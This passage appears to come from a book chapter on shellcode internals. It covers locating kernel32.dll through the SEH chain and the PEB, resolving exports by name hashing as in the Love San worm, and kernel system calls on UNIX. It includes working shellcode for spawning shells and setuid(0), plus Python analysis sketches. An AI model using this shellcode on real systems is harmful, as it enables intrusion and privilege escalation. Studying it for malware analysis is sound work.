The possibility of calling system functions directly is not a mandatory condition of a successful attack, because the vulnerable program already contains everything required for the attack, including calls to the system functions and the high-level wrappers of the application libraries. Having disassembled the application being investigated and determined the addresses of the required functions, it is possible to use the following constructs: call target address, push return address/jmp relative address, or mov register, absolute target address/push return address/jmp register.
The attacker's position is favorable if the vulnerable program imports the LoadLibrary and GetProcAddress functions, because the shellcode will then be able to load any DLL and call any of its functions. What if there is no GetProcAddress in the import table? In this case, the attacker will have to determine the addresses of the required functions independently, starting from the base load address returned by the LoadLibrary function, either by manually parsing the Portable Executable (PE) file or by identifying the functions by their signatures. The first approach is too complicated, and the second one is unreliable. It is unacceptable to rely on fixed addresses of the system functions, because they depend on the version of the operating system.
What can be done if the LoadLibrary function is missing from the import table, along with one or more system functions required for the shellcode to propagate? In UNIX systems, it is possible to call the kernel functions directly, either through the interrupt at the 80h vector (in Linux, parameters are passed through the registers; in FreeBSD, through the stack) or through the far call at the 0007h:00000000h address (in System V, parameters are passed through the stack). This approach is the best. The numbers of the system calls are contained in the /usr/include/sys/syscall.h file (see also the section "Implementing System Calls in Different Operating Systems"). Also, recall the syscall and sysenter machine commands, which, as their names suggest, carry out direct system calls, along with passing parameters.
In Windows NT-like operating systems, the situation is more difficult. All interactions with the kernel are carried out through the int 2Eh interrupt, an interface unofficially called the native API. Some information on this topic can be found in the legendary "Interrupt List" by Ralf Brown ( http://www.cfyme.com/rbrown.htm ) and Windows NT/2000 Native API Reference by Gary Nebbett; however, this information is not enough. This interface is documented extremely sparingly, and for now the only way to get information about it is to analyze the disassembled listings of kernel32.dll and ntdll.dll. Working with the native API requires a high level of professional skill and detailed knowledge of the operating system architecture. The Windows NT kernel operates with a small number of low-level functions. These functions are not suitable for direct use and, like any "semi-product," must be prepared as appropriate.
For example, the LoadLibrary function is "split" into at least two system calls: NtCreateFile (EAX == 17h) opens a file, and NtCreateSection (EAX == 2Bh) maps that file into memory (in other words, it works like the CreateFileMapping function), after which NtClose (EAX == 0Fh) closes the descriptor. The GetProcAddress function is implemented entirely within ntdll.dll, and there is no trace of it in the kernel. Nevertheless, the PE specification is included in the Platform SDK and MSDN, so with it at hand the export table can be analyzed manually.
On the other hand, there is no need to access the kernel to emulate the LoadLibrary function, because the ntdll.dll and kernel32.dll libraries are always present in the address space of any process. Thus, if the hacker determines the addresses at which they are loaded, the goal is achieved. I know two methods of solving this problem: using the system structured exception handler and using the Process Environment Block (PEB). The first approach is self-evident but bulky and inelegant. The second approach is elegant but unreliable. However, the latter circumstance didn't prevent the Love San worm from propagating itself over millions of machines.
If an exception arises in the course of application execution (such as division by zero or access to a nonexistent memory page) and the application doesn't handle this situation on its own, then the system handler takes control. The system handler is usually implemented within kernel32.dll. In Windows 2000 Service Pack 3, this handler is located at the 77EA1856h address. This address depends on the version of the operating system; therefore, expertly designed shellcode must determine the handler address automatically. There is no need to cause an exception and trace the code, as was usual in the time of good old MS-DOS. It is much better to investigate the chain of structured exception handlers, each described by an EXCEPTION_REGISTRATION structure. The first double word of such a structure contains the pointer to the next handler record (or the FFFFFFFFh value if there are no more handlers), and the second double word contains the address of the current handler (Listing 10.6).
_EXCEPTION_REGISTRATION struc
    prev    dd ?
    handler dd ?
_EXCEPTION_REGISTRATION ends
The first element of the chain of handlers is stored at the FS:[00000000h] address, and all the further ones reside directly in the address space of the process being investigated. Moving from element to element, it is possible to view all handlers until an element is encountered in which the prev field contains the FFFFFFFFh value. The handler field of that last element contains the address of the system handler. Unofficially, this mechanism is called "unwinding the structured exceptions stack." For more information on this topic, read "A Crash Course on the Depths of Win32 Structured Exception Handling" by Matt Pietrek (it is included in MSDN, see http://msdn.microsoft.com/msdnmag/issues/03/06/WindowsServer2003/default.aspx ).
Listing 10.7 provides an illustration of this mechanism. The code of this example returns the address of the system handler to the EAX register.
.data:00501007         XOR  EAX, EAX            ; EAX := 0
.data:00501009         XOR  EBX, EBX            ; EBX := 0
.data:0050100B         MOV  ECX, fs:[EAX + 4]   ; Handler address
.data:0050100F         MOV  EAX, fs:[EAX]       ; Pointer to the next handler
.data:00501012         JMP  short loc_501019    ; Check the loop condition.
.data:00501014 ; ----------------------------------------------------
.data:00501014 loc_501014:
.data:00501014         MOV  EBX, [EAX + 4]      ; Handler address
.data:00501017         MOV  EAX, [EAX]          ; Pointer to the next handler
.data:00501019
.data:00501019 loc_501019:
.data:00501019         CMP  EAX, 0FFFFFFFFh     ; Is this the last handler?
.data:0050101C         JNZ  short loc_501014    ; Loop until the loop
                                                ; condition is satisfied.
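The traversal is easy to try out away from the target. What follows is a minimal sketch in Python, used here only as a convenient notation; it walks a chain of two-double-word records laid out in a simulated memory buffer. The helper names, the record addresses, and the handler values are hypothetical and serve only as an illustration.

```python
import struct

END_OF_CHAIN = 0xFFFFFFFF  # value of prev in the last record


def read_dword(memory, address):
    """Read a little-endian 32-bit value from the simulated memory."""
    return struct.unpack_from("<I", memory, address)[0]


def last_handler(memory, first_record):
    """Follow the prev pointers and return the handler of the final record.

    Returns None if the chain is empty (first_record is FFFFFFFFh).
    """
    record = first_record
    handler = None
    visited = set()
    while record != END_OF_CHAIN:
        if record in visited:            # guard against a corrupted, cyclic chain
            raise ValueError("cycle in the handler chain")
        visited.add(record)
        handler = read_dword(memory, record + 4)   # handler field
        record = read_dword(memory, record)        # prev field
    return handler


# Hypothetical chain of three records at offsets 10h, 20h, and 30h.
memory = bytearray(0x40)
struct.pack_into("<II", memory, 0x10, 0x20, 0x00401000)
struct.pack_into("<II", memory, 0x20, 0x30, 0x00402000)
struct.pack_into("<II", memory, 0x30, END_OF_CHAIN, 0x77EA1856)

print(hex(last_handler(memory, 0x10)))
```

The cycle check is not part of the original loop; it is added because a damaged chain would otherwise make the sketch spin forever.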
If at least one address belonging to kernel32.dll is known to the hacker, then it will not be difficult to determine its base load address (it is a multiple of 10000h, and the image begins with the NewExe header, which can be easily recognized by the MZ and PE signatures). The code provided in Listing 10.8 accepts the address of the system handler in the EBP register and returns the load address of kernel32.dll in the same register.
001B:0044676C  CMP   WORD PTR [EBP+00], 5A4D          ; Is this MZ?
001B:00446772  JNZ   00446781                         ; No, it isn't.
001B:00446774  MOV   EAX, [EBP + 3C]                  ; To PE header
001B:00446777  CMP   DWORD PTR [EAX + EBP + 0], 4550  ; Is this PE?
001B:0044677F  JZ    00446789                         ; Yes, it is.
001B:00446781  SUB   EBP, 00010000                    ; Previous 64K block
001B:00446787  LOOP  0044676C                         ; Loop
001B:00446789  ...
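The same search can be sketched in Python over a simulated address space. The sketch assumes steps of 10000h, matching the SUB EBP, 00010000 instruction of the listing, and it first aligns the starting address down to that boundary (a step the listing leaves to the caller). The function name, the buffer layout, and the decoy block are hypothetical.

```python
import struct

GRANULARITY = 0x10000  # step used by SUB EBP, 00010000


def find_image_base(memory, address, max_steps=16):
    """Scan downward from address for a block starting with MZ that points to PE."""
    base = address & ~(GRANULARITY - 1)       # align down to a 64 KB boundary
    for _ in range(max_steps):
        if base < 0:
            return None
        if memory[base:base + 2] == b"MZ":
            # The double word at 3Ch holds the offset of the PE header.
            e_lfanew = struct.unpack_from("<I", memory, base + 0x3C)[0]
            pe = base + e_lfanew
            if memory[pe:pe + 4] == b"PE\0\0":
                return base
        base -= GRANULARITY
    return None


# Simulated address space: a real image at 30000h and a decoy MZ at 40000h.
memory = bytearray(0x60000)
memory[0x30000:0x30002] = b"MZ"
struct.pack_into("<I", memory, 0x3003C, 0x80)
memory[0x30080:0x30084] = b"PE\0\0"
memory[0x40000:0x40002] = b"MZ"               # decoy: no PE signature behind it

print(hex(find_image_base(memory, 0x5A123)))
```

Checking both signatures matters: the decoy block passes the MZ test but is rejected because the double word it points to is not PE.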
There is an even more elegant method of determining the base load address of the kernel32.dll library based on PEB, the pointer to which is contained in the double word located at the FS:[00000030h] address. The structure of the PEB is shown in Listing 10.9.
PEB STRUC
    PEB_InheritedAddressSpace     DB ?
    PEB_ReadImageFileExecOptions  DB ?
    PEB_BeingDebugged             DB ?
    PEB_SpareBool                 DB ?
    PEB_Mutant                    DD ?
    PEB_ImageBaseAddress          DD ?
    PEB_PebLdrData                DD PEB_LDR_DATA PTR ?   ; +0Ch
    ...
    PEB_SessionId                 DD ?
PEB ENDS
At the 0Ch offset, the PEB contains the pointer to the PEB_LDR_DATA structure, which describes the list of loaded DLLs in the order of their initialization. The ntdll.dll library is the first to initialize, and kernel32.dll follows it. The PEB_LDR_DATA structure is shown in Listing 10.10.
PEB_LDR_DATA STRUC
    PEB_LDR_cbsize                   DD ?            ; +00
    PEB_LDR_Flags                    DD ?            ; +04
    PEB_LDR_Unknown8                 DD ?            ; +08
    PEB_LDR_InLoadOrderModuleList    LIST_ENTRY ?    ; +0Ch
    PEB_LDR_InMemoryOrderModuleList  LIST_ENTRY ?    ; +14h
    PEB_LDR_InInitOrderModuleList    LIST_ENTRY ?    ; +1Ch
PEB_LDR_DATA ENDS

LIST_ENTRY STRUC
    LE_FORWARD     DD *forward_in_the_list      ; +00h
    LE_BACKWARD    DD *backward_in_the_list     ; +04h
    LE_IMAGE_BASE  DD imagebase_of_ntdll.dll    ; +08h
    ...
    LE_IMAGE_TIME  DD imagetimestamp            ; +44h
LIST_ENTRY ENDS
In general, the idea consists of reading the double word at the FS:[00000030h] address, treating it as the pointer to the PEB, following the pointer located at the 0Ch offset to PEB_LDR_DATA, and taking the head of InInitOrderModuleList at the 1Ch offset there. Having discarded the first element, belonging to ntdll.dll, it is possible to obtain the pointer to the LIST_ENTRY that contains the characteristics of kernel32.dll (in particular, the base load address is stored in the third double word). It is much easier to program this algorithm than to describe it. The preceding description easily fits within five Assembly commands.
Listing 10.11 shows the code fragment from the Love San worm, a dangerous threat to the Internet. This fragment was not written by the author of the worm; rather, it was borrowed from third-party sources. This is indicated by the presence of "extra" Assembly commands intended for compatibility with Windows 9x (where the situation differs from the one that exists in Windows NT). The natural habitat of the Love San worm is limited to Windows NT-like systems, and it is unable to infect Windows 9x systems.
data:004046FE 64 A1 30 00 00    MOV  EAX, large fs:30h   ; PEB base
data:00404704 85 C0             TEST EAX, EAX            ;
data:00404706 78 0C             JS   short loc_404714    ; Windows9x
data:00404708 8B 40 0C          MOV  EAX, [EAX + 0Ch]    ; PEB_LDR_DATA
data:0040470B 8B 70 1C          MOV  ESI, [EAX + 1Ch]    ; The first element of
                                                         ; InInitOrderModuleList
data:0040470E AD                LODSD                    ; Next element
data:0040470F 8B 68 08          MOV  EBP, [EAX + 8]      ; Base address of
                                                         ; kernel32.dll
data:00404712 EB 09             JMP  SHORT loc_40471D
data:00404714 ; ------------------------------------------------------------
data:00404714 loc_404714:                                ; CODE XREF: kk_get_kernel32 + A j
data:00404714 8B 40 34          MOV  EAX, [EAX + 34h]
data:00404717 8B A8 B8 00 00+   MOV  EBP, [EAX + 0B8h]
data:00404717
data:0040471D loc_40471D:                                ; CODE XREF: kk_get_kernel32 + 16 j
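The Windows NT branch of this fragment amounts to four dependent memory reads. A minimal Python sketch over a simulated memory buffer makes the pointer chain explicit. It relies on the simplified LIST_ENTRY layout of Listing 10.10 and on the text's assumption that the second element of the list belongs to kernel32.dll; all addresses and base values are hypothetical.

```python
import struct


def dword(memory, address):
    """Read a little-endian 32-bit value from the simulated memory."""
    return struct.unpack_from("<I", memory, address)[0]


def kernel32_base(memory, peb):
    """Repeat the four reads of the NT branch of the listing."""
    ldr = dword(memory, peb + 0x0C)      # MOV EAX, [EAX + 0Ch]  PEB_LDR_DATA
    first = dword(memory, ldr + 0x1C)    # MOV ESI, [EAX + 1Ch]  first list element
    second = dword(memory, first)        # LODSD                 forward link
    return dword(memory, second + 0x08)  # MOV EBP, [EAX + 8]    image base


# Hypothetical layout: PEB at 100h, PEB_LDR_DATA at 200h,
# list elements for ntdll.dll at 300h and kernel32.dll at 400h.
memory = bytearray(0x500)
struct.pack_into("<I", memory, 0x100 + 0x0C, 0x200)
struct.pack_into("<I", memory, 0x200 + 0x1C, 0x300)
struct.pack_into("<III", memory, 0x300, 0x400, 0x21C, 0x77F80000)
struct.pack_into("<III", memory, 0x400, 0x21C, 0x300, 0x77E80000)

print(hex(kernel32_base(memory, 0x100)))
```

The sketch performs no validation at all, which mirrors the original: if the second element is not the expected library, the wrong base is returned silently.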
The code fragment in Listing 10.11 is responsible for determining the base load address of kernel32.dll and ensuring that the worm is practically independent of the version of the attacked operating system.
Manual parsing of the PE format, however intimidating it sounds, can be implemented easily. The double word located at the 3Ch offset from the base load address contains the offset (not the pointer) of the PE file header. This header, in turn, contains the offset of the export table in the double word at the 78h offset. In the export table, bytes 18h to 1Bh and 20h to 23h store the number of exported functions and the offset of the table of exported names, respectively (for functions exported by ordinals, the offset of the ordinals table is located in bytes 24h to 27h). Memorize these values: 3Ch, 78h, and 20h/24h. Because they are frequently encountered when investigating the code of worms and exploits, doing so will considerably simplify identification of their algorithms. For example, the fragment of the Love San worm responsible for determining the address of the table of exported names is provided in Listing 10.12.
.data:00404728   MOV EBP, [ESP + arg_4]       ; Base load address of kernel32
.data:0040472C   MOV EAX, [EBP + 3Ch]         ; To PE header
.data:0040472F   MOV EDX, [EBP + EAX + 78h]   ; To the export table
.data:00404733   ADD EDX, EBP
.data:00404735   MOV ECX, [EDX + 18h]         ; Number of exported functions
.data:00404738   MOV EBX, [EDX + 20h]         ; To the table of exported names
.data:0040473B   ADD EBX, EBP                 ; Address of the table
                                              ; of exported names
Now, based on the address of the table of exported names (which, in a rough approximation, represents an array of ASCIIZ text strings, each of which corresponds to an API function), it is possible to obtain all the required information. However, a character-by-character comparison is inefficient, and hackers often abandon it. This is because, first, the names of most API functions are too bulky while the shellcode is strictly limited in size. Second, explicitly naming the API functions to be loaded considerably simplifies the analysis of the shellcode algorithms. The algorithm of hash comparison, on the other hand, is free from these drawbacks. In general, it is reduced to the convolution of the compared strings by some function f and the comparison of the results. Detailed information about this algorithm can be found in specialized literature (for instance, see The Art of Computer Programming by Donald Knuth). Here, only the code supplied with detailed comments will be provided (Listing 10.13).
.data:0040473D loc_40473D:                   ; CODE XREF: kk_get_proc_adr + 36 j
.data:0040473D   JECXZ short loc_404771      ; Error
.data:0040473F   DEC   ECX                   ; ECX counts down through
                                             ; the exported names.
.data:00404740   MOV   ESI, [EBX + ECX*4]    ; Offset of the current name, starting
                                             ; from the end of the array
.data:00404743   ADD   ESI, EBP              ; Address of the current name
.data:00404745   XOR   EDI, EDI              ; EDI := 0
.data:00404747   CLD                         ; Reset the direction flag.
.data:00404748
.data:00404748 loc_404748:                   ; CODE XREF: kk_get_proc_adr + 30 j
.data:00404748   XOR   EAX, EAX              ; EAX := 0
.data:0040474A   LODSB                       ; Read the next character
                                             ; of the function name.
.data:0040474B   CMP   AL, AH                ; Is this the end of the string?
.data:0040474D   JZ    short loc_404756      ; If this is the end,
                                             ; then jump to the end.
.data:0040474F   ROR   EDI, 0Dh              ; Hash the function name
.data:00404752   ADD   EDI, EAX              ; and accumulate the hash sum
                                             ; in the EDI register.
.data:00404754   JMP   short loc_404748      ;
.data:00404756 loc_404756:                   ; CODE XREF: kk_get_proc_adr + 29 j
.data:00404756   CMP   EDI, [ESP + ARG_0]    ; Is this the hash of the function?
.data:0040475A   JNZ   short loc_40473D      ; If no, continue testing.
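For an analyst, the practical use of this loop is the reverse task: given a 32-bit constant found in a worm, find out which API name it stands for. The Python sketch below reproduces the inner loop under the assumption that the accumulation step rotates the running sum right by 0Dh bits and then adds the character (the rotate-and-add scheme widely used in Windows shellcode). The function names and the candidate list are hypothetical.

```python
def ror32(value, count):
    """Rotate a 32-bit value right by count bits."""
    count %= 32
    return ((value >> count) | (value << (32 - count))) & 0xFFFFFFFF


def name_hash(name):
    """Fold an ASCII function name into 32 bits: rotate right by 13, add the byte."""
    total = 0
    for byte in name.encode("ascii"):
        total = (ror32(total, 13) + byte) & 0xFFFFFFFF
    return total


def identify(constant, candidates):
    """Return the candidate names whose hash equals the constant."""
    return [name for name in candidates if name_hash(name) == constant]


# Hypothetical candidate list; in practice it would be the full export
# list of the DLL under investigation.
CANDIDATES = ["LoadLibraryA", "GetProcAddress", "ExitProcess", "CreateFileA"]

print(hex(name_hash("LoadLibraryA")))
print(identify(0xEC0E4E8E, CANDIDATES))
```

Precomputing the hashes of every export of kernel32.dll once and keeping them in a dictionary turns the identification of such constants into a simple lookup.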
Knowing the index of the target function in the table of exported names, it is easy to determine its address. For example, this can be done as shown in Listing 10.14.
.data:0040475C   MOV EBX, [EDX + 24h]     ; Offset of the exported ordinals table
.data:0040475F   ADD EBX, EBP             ; Address of the ordinals table
.data:00404761   MOV CX, [EBX + ECX*2]    ; Get the index within the ordinals table.
.data:00404765   MOV EBX, [EDX + 1Ch]     ; Offset of the exported addresses table
.data:00404768   ADD EBX, EBP             ; Address of the exported addresses table
.data:0040476A   MOV EAX, [EBX + ECX*4]   ; Get the offset of the function by index.
.data:0040476D   ADD EAX, EBP             ; Get the function address.
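The whole route from the base address to the function address (3Ch, 78h, 18h, 20h, 24h, 1Ch) can be checked against a synthetic image. The Python sketch below is an illustration under stated assumptions: it compares names directly instead of hashing them, the 78h offset applies to 32-bit PE files only, and the image is a hypothetical stub containing nothing but the fields the listings touch.

```python
import struct


def u16(image, offset):
    return struct.unpack_from("<H", image, offset)[0]


def u32(image, offset):
    return struct.unpack_from("<I", image, offset)[0]


def cstring(image, offset):
    """Read an ASCIIZ string starting at offset."""
    end = image.index(b"\0", offset)
    return bytes(image[offset:end]).decode("ascii")


def resolve_export(image, wanted, load_base=0):
    """Return load_base + offset of the exported function, or None."""
    pe_header = u32(image, 0x3C)                 # offset of the PE header
    export_dir = u32(image, pe_header + 0x78)    # offset of the export table
    number_of_names = u32(image, export_dir + 0x18)
    functions = u32(image, export_dir + 0x1C)    # table of exported addresses
    names = u32(image, export_dir + 0x20)        # table of exported names
    ordinals = u32(image, export_dir + 0x24)     # table of ordinals
    for i in range(number_of_names):
        if cstring(image, u32(image, names + 4 * i)) == wanted:
            index = u16(image, ordinals + 2 * i)
            return load_base + u32(image, functions + 4 * index)
    return None


def build_sample_image():
    """Build a hypothetical stub with two named exports, Alpha and Beta."""
    image = bytearray(0x200)
    image[0:2] = b"MZ"
    struct.pack_into("<I", image, 0x3C, 0x80)
    image[0x80:0x84] = b"PE\0\0"
    struct.pack_into("<I", image, 0x80 + 0x78, 0x100)
    struct.pack_into("<I", image, 0x100 + 0x18, 2)
    struct.pack_into("<I", image, 0x100 + 0x1C, 0x140)
    struct.pack_into("<I", image, 0x100 + 0x20, 0x150)
    struct.pack_into("<I", image, 0x100 + 0x24, 0x160)
    struct.pack_into("<3I", image, 0x140, 0x1000, 0x2000, 0x3000)
    struct.pack_into("<2I", image, 0x150, 0x170, 0x180)
    struct.pack_into("<2H", image, 0x160, 2, 0)
    image[0x170:0x176] = b"Alpha\0"
    image[0x180:0x185] = b"Beta\0"
    return image


image = build_sample_image()
print(hex(resolve_export(image, "Beta", load_base=0x77E80000)))
```

The ordinals table is the step most often forgotten: the position of a name in the names table is not the index into the addresses table, which is why Alpha, the first name, resolves to the third address in this stub.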
The mechanism of system calls is the background of the operating system, its internal "kitchen," which is not always well documented. Inside a worm, constants and commands float about, manipulating registers in a sophisticated manner, while the physical meaning of what is going on remains unclear.
The family of UNIX-like operating systems overwhelms everyone with its variety, complicating the development of portable shellcode to the extreme. At least six methods of organizing the interface with the kernel are used, including far call by selector 7 offset 0 (HP-UX/PA-RISC, Solaris/x86, xBSD/x86), syscall (IRIX/MIPS), ta 8 (Solaris/SPARC), svca (AIX/Power/PowerPC), INT 25h (BeOS/x86), and INT 80h (xBSD/x86, Linux/x86). The order of passing parameters and the numbers of the system calls are different for different operating systems. Some systems are listed twice, which means that they use hybrid mechanisms of system calls. It is impractical to describe every system in detail here, because doing so would take too much space. Furthermore, this information was long ago provided in "UNIX Assembly Codes Development for Vulnerabilities Illustration Purposes" by the Last Stage of Delirium Research Group ( http://opensores.thebunker.net/pub/mirrors/blackhat/presentations/bh-usa-01/LSD/bh-usa-01-lsd.pdf ).
Yes! This is the same legendary hacker group that found a hole in Remote Procedure Call (RPC). They are real experts and excellent programmers. The preceding manual is highly recommended to code diggers in general and investigators of viruses and worms in particular.
Provided in Listing 10.15 is the fragment of the mworm lab worm, which I developed after reading their documentation. This worm demonstrates the technique of using system calls under xBSD/x86 (see also Fig. 10.1).
data:0804F860 x86_fbsd_shell:
data:0804F860 31 C0             XOR  EAX, EAX      ; EAX := 0
data:0804F862 99                CDQ                ; EDX := 0
data:0804F863 50                PUSH EAX
data:0804F864 50                PUSH EAX
data:0804F865 50                PUSH EAX
data:0804F866 B0 7E             MOV  AL, 7Eh
data:0804F868 CD 80             INT  80h           ; LINUX - sys_sigprocmask
data:0804F86A 52                PUSH EDX           ; Terminating zero
data:0804F86B 68 6E 2F 73 68    PUSH 68732F6Eh     ; ..n/sh
data:0804F870 44                INC  ESP
data:0804F871 68 2F 62 69 6E    PUSH 6E69622Fh     ; /bin/n..
data:0804F876 89 E3             MOV  EBX, ESP
data:0804F878 52                PUSH EDX
data:0804F879 89 E2             MOV  EDX, ESP
data:0804F87B 53                PUSH EBX
data:0804F87C 89 E1             MOV  ECX, ESP
data:0804F87E 52                PUSH EDX
data:0804F87F 51                PUSH ECX
data:0804F880 53                PUSH EBX
data:0804F881 53                PUSH EBX
data:0804F882 6A 3B             PUSH 3Bh
data:0804F884 58                POP  EAX
data:0804F885 CD 80             INT  80h           ; LINUX - sys_olduname
data:0804F887 31 C0             XOR  EAX, EAX
data:0804F889 FE C0             INC  AL
data:0804F88B CD 80             INT  80h           ; LINUX - sys_exit
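One detail of this listing is easy to miss when reading the disassembly: the PUSH 68732F6Eh / INC ESP / PUSH 6E69622Fh sequence assembles a seven-character path out of two four-byte immediates without a single zero byte in the code. The Python sketch below simulates just these stack operations to show which string ends up at the stack top. The Stack class is a hypothetical model of a stack growing toward lower addresses, nothing more.

```python
import struct


class Stack:
    """A toy model of a 32-bit stack that grows toward lower addresses."""

    def __init__(self, size=64):
        self.memory = bytearray(size)
        self.esp = size

    def push(self, value):
        """PUSH imm32: decrement ESP by 4 and store a little-endian double word."""
        self.esp -= 4
        struct.pack_into("<I", self.memory, self.esp, value)

    def inc_esp(self):
        """INC ESP: move the stack top up by a single byte."""
        self.esp += 1

    def cstring_at_esp(self):
        """Read the ASCIIZ string that starts at the stack top."""
        end = self.memory.index(b"\0", self.esp)
        return bytes(self.memory[self.esp:end]).decode("ascii")


stack = Stack()
stack.push(0)            # PUSH EDX        terminating zero
stack.push(0x68732F6E)   # PUSH 68732F6Eh  bytes "n/sh"
stack.inc_esp()          # INC ESP         skip the padding "n"
stack.push(0x6E69622F)   # PUSH 6E69622Fh  bytes "/bin"; its last byte lands on the old "n"
path = stack.cstring_at_esp()
print(path)
```

The second push overlaps the first by one byte, so the padding character of the first immediate is overwritten by the final character of the second one, and EBX ends up pointing to an ordinary path with a single slash.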
Under Solaris/SPARC, the system call is carried out using the trap raised by the ta 8 machine command. The number of the system call is passed using the %g1 register, and arguments are passed using the %o0, %o1, %o2, %o3, and %o4 registers. The list of numbers of the most widely used system functions is provided in Listing 10.16. Listing 10.17 provides an example of shellcode demonstrating the use of system calls under Solaris/SPARC.
Syscall     %g1    %o0, %o1, %o2, %o3, %o4
Exec        00Bh   path = "/bin/ksh", [a0 = path, 0]
Exec        00Bh   path = "/bin/ksh", [a0 = path, a1 = "-c", a2 = cmd, 0]
Setuid      017h   uid = 0
Mkdir       050h   path = "b..", mode = (each value is valid)
Chroot      03Dh   path = "b..", "."
Chdir       00Ch   path = ".."
Ioctl       036h   sfd, TI_GETPEERNAME = 5491h, [mlen = 54h, len = 54h, sadr = []]
so_socket   0E6h   AF_INET = 2, SOCK_STREAM = 2, prot = 0, devpath = 0, SOV_DEFAULT = 1
bind        0E8h   sfd, sadr = [33h, 2, hi, lo, 0, 0, 0, 0], len = 10h, SOV_SOCKSTREAM = 2
listen      0E9h   sfd, backlog = 5, vers = (not required in this syscall)
accept      0EAh   sfd, 0, 0, vers = (not required in this syscall)
fcntl       03Eh   sfd, F_DUP2FD = 09h, fd = 0, 1, 2
char shellcode[]=           /* 10*4+8 bytes */
    "\x20\xbf\xff\xff"      /* bn, a <shellcode-4>  ; \                               */
    "\x20\xbf\xff\xff"      /* bn, a <shellcode>    ; +- the current command          */
                            /*                      ;    pointer in %o7               */
    "\x7f\xff\xff\xff"      /* call <shellcode+4>   ; /                               */
    "\x90\x03\xe0\x20"      /* add %o7,32,%o0       ; %o0 contains the pointer        */
                            /*                      ; to /bin/ksh.                    */
    "\x92\x02\x20\x10"      /* add %o0,16,%o1       ; %o1 contains the pointer        */
                            /*                      ; to free memory.                 */
    "\xc0\x22\x20\x08"      /* st %g0,[%o0+8]       ; Place terminating zero          */
                            /*                      ; into /bin/ksh.                  */
    "\xd0\x22\x20\x10"      /* st %o0,[%o0+16]      ; Reset the memory to zero        */
                            /*                      ; by the %o1 pointer.             */
    "\xc0\x22\x20\x14"      /* st %g0,[%o0+20]      ; The same                        */
    "\x82\x10\x20\x0b"      /* mov 0x0b,%g1         ; Number of the exec              */
                            /*                      ; system function                 */
    "\x91\xd0\x20\x08"      /* ta 8                 ; Call the exec function.         */
    "/bin/ksh";
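When such a byte string is found in a captured sample, the system call number can be recovered mechanically, because SPARC instructions are fixed-width 32-bit big-endian words. The Python sketch below is a deliberately narrow decoder, not a disassembler: it recognizes only mov imm, %g1 (a synonym for or %g0, imm, %g1) and the trap instruction, and it treats the 13-bit immediate as unsigned. The function names are hypothetical.

```python
import struct

OP3_OR = 0x02     # or; "mov imm, reg" is assembled as "or %g0, imm, reg"
OP3_TICC = 0x3A   # trap on condition codes; "ta" is the "always" variant


def decode_words(code):
    """Split big-endian SPARC machine code into 32-bit instruction words."""
    count = len(code) // 4
    return list(struct.unpack(">%dI" % count, code[:count * 4]))


def fields(word):
    """Extract the fields of a format 3 instruction."""
    return {
        "op": word >> 30,
        "rd": (word >> 25) & 0x1F,
        "op3": (word >> 19) & 0x3F,
        "rs1": (word >> 14) & 0x1F,
        "i": (word >> 13) & 1,
        "simm13": word & 0x1FFF,
    }


def syscall_number(code):
    """Return the immediate loaded into %g1 before the first trap, or None."""
    g1 = None
    for word in decode_words(code):
        f = fields(word)
        if f["op"] != 2:
            continue
        if f["op3"] == OP3_OR and f["rd"] == 1 and f["rs1"] == 0 and f["i"] == 1:
            g1 = f["simm13"]          # mov imm, %g1
        elif f["op3"] == OP3_TICC:
            return g1                 # trap reached: %g1 holds the number
    return None


# The last two instructions of the listing: mov 0x0b, %g1 and ta 8.
tail = b"\x82\x10\x20\x0b\x91\xd0\x20\x08"
print(hex(syscall_number(tail)))
```

The result can then be looked up in the table of system call numbers for the platform in question.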
Under Solaris/x86, the system call is carried out using the far call gateway at the 0007:00000000 address (selector 7 offset 0). The number of the system call is passed using the EAX register, and arguments are passed through the stack, the leftmost argument being the last to be pushed into the stack. The function being called must clear the stack on its own. The list of numbers of the most widely used system functions is provided in Listing 10.18. Listing 10.19 provides an example of shellcode demonstrating the use of system calls under Solaris/x86.
syscall     %eax   stack
exec        0Bh    RET, path = "/bin/ksh", [a0 = path, 0]
exec        0Bh    RET, path = "/bin/ksh", [a0 = path, a1 = "-c", a2 = cmd, 0]
setuid      17h    RET, uid = 0
mkdir       50h    RET, path = "b..", mode = (each value is valid)
chroot      3Dh    RET, path = "b..", "."
chdir       0Ch    RET, path = ".."
ioctl       36h    RET, sfd, TI_GETPEERNAME = 5491h, [mlen = 91h, len = 91h, adr = []]
so_socket   E6h    RET, AF_INET = 2, SOCK_STREAM = 2, prot = 0, devpath = 0, SOV_DEFAULT = 1
bind        E8h    RET, sfd, sadr = [FFh, 2, hi, lo, 0, 0, 0, 0], len = 10h, SOV_SOCKSTREAM = 2
listen      E9h    RET, sfd, backlog = 5, vers = (not required in this syscall)
accept      EAh    RET, sfd, 0, 0, vers = (not required in this syscall)
fcntl       3Eh    RET, sfd, F_DUP2FD = 09h, fd = 0, 1, 2
char setuidcode[]=      /* 7 bytes */
    "\x33\xc0"          /* XORL %EAX, %EAX   ; EAX := 0                       */
    "\x50"              /* PUSHL %EAX        ; Push zero into the stack.      */
    "\xb0\x17"          /* MOVB $0x17, %AL   ; Setuid system function number  */
    "\xff\xd6"          /* CALL *%ESI        ; setuid(0)                      */
;
Under Linux/x86, the system call is carried out through a software interrupt at vector 80h, raised by the int 80h machine instruction. The number of the system call is passed through the EAX register, and arguments are passed through the EBX, ECX, and EDX registers. The list of numbers of the most widely used system functions is provided in Listing 10.20. Listing 10.21 provides an example of shellcode demonstrating the use of system calls under Linux/x86.
Syscall      %EAX   %EBX, %ECX, %EDX
exec         0Bh    path = "/bin//sh", [a0 = path, 0]
exec         0Bh    path = "/bin//sh", [a0 = path, a1 = "-c", a2 = cmd, 0]
setuid       17h    uid = 0
mkdir        27h    path = "b..", mode = 0 (each value is valid)
chroot       3Dh    path = "b..", "."
chdir        0Ch    path = ".."
socketcall   66h    getpeername = 7, [sfd, sadr = [], [len = 10h]]
socketcall   66h    socket = 1, [AF_INET = 2, SOCK_STREAM = 2, prot = 0]
socketcall   66h    bind = 2, [sfd, sadr = [FFh, 2, hi, lo, 0, 0, 0, 0], len = 10h]
socketcall   66h    listen = 4, [sfd, backlog = 102]
socketcall   66h    accept = 5, [sfd, 0, 0]
dup2         3Fh    sfd, fd = 2, 1, 0
char setuidcode[]=      /* 8 bytes */
    "\x33\xc0"          /* XORL %EAX, %EAX   ; EAX := 0                              */
    "\x31\xdb"          /* XORL %EBX, %EBX   ; EBX := 0                              */
    "\xb0\x17"          /* MOVB $0x17, %AL   ; Number of the setuid system function  */
    "\xcd\x80"          /* INT $0x80         ; setuid(0)                             */
;
